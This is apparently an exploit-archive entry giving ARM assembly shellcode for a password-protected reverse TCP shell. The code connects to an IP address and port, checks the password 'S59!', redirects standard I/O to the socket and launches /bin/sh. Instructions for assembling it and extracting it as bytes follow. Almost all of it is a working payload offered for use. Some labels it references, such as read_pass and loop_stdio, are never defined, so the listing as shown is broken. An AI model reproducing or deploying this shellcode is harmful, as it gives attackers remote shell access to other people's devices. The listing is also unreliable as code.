Linux/ARM - Reverse ( Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)




100 bytes





* Title:    Linux/ARM - Password-Protected Reverse TCP Shell
* Date:     2019-04-20
* Tested:   armv6 (32-bit Raspberry Pi I)
* Author:   Alan Vivona - @syscall59 -
* Size:     100 bytes
* No null bytes / Null-free

.section .text
.global _start

    add   r3, pc, #1 // switch to thumb mode 
    bx    r3


// [281] socket(2, 1, 0) 
    mov   r0, #2
    mov   r1, #1
    eor   r2, r2
    mov   r7, #200
    add   r7, #81
    svc   #1
mov   r10, r0 // save sockfd into r10

// [283] connect(socketfd, target, addrlen) 
    // socket fd is in r0 already
    adr   r1, target
    strb  r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
    strb  r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
    strb  r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
    mov   r2, #16
    add   r7, #2  // 281 + 2 = 283
    svc   #1

// [003] read(sourcefd, destbuffer, amount)
    push  {r1}
    mov   r1, sp
    mov   r2, #4
    mov   r7, #3
        mov   r0, r10
        svc   #1
        ldr   r3, pass
        ldr   r4, [r1]
        eor   r3, r3, r4
    bne read_pass

// [063] dup2(sockfd, stdIO) 
    mov   r1, #2  // r1 = 2 (stderr)
    mov   r7, #63 // r7 = 63 (dup2)
        mov   r0, r10 // r0 = saved sockfd 
        svc   #1
        sub   r1,#1
    bpl loop_stdio    // loop while r3 >= 0 

// [011] execve(command, 0, 0) 
    adr   r0, command
    eor   r2, r2
    eor   r1, r1
    strb  r2, [r0, #7]
    mov   r7, #11 
    svc   #1

// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte)
// align_bytes : .byte 0xff, 0xff

    // The 0xff will be replaced with a null on runtime
    .ascii "\x02\xff"   // Protocol: IPv4/TCP. 
    .ascii "\x11\x5c"   // Port : 4444 
    // The '255' will be replaced with a 0 on runtime
    .byte 127,255,255,1 // IP: 
command: .ascii "/bin/sh?"  // The '?' will be replaced with a null on runtime

pass: .ascii "S59!"

    Compile, link & extract: 
        as ARM-reverse-shell.s -o ARM-reverse-shell.o
        ld -N ARM-reverse-shell.o -o ARM-reverse-shell
        objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
        hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump

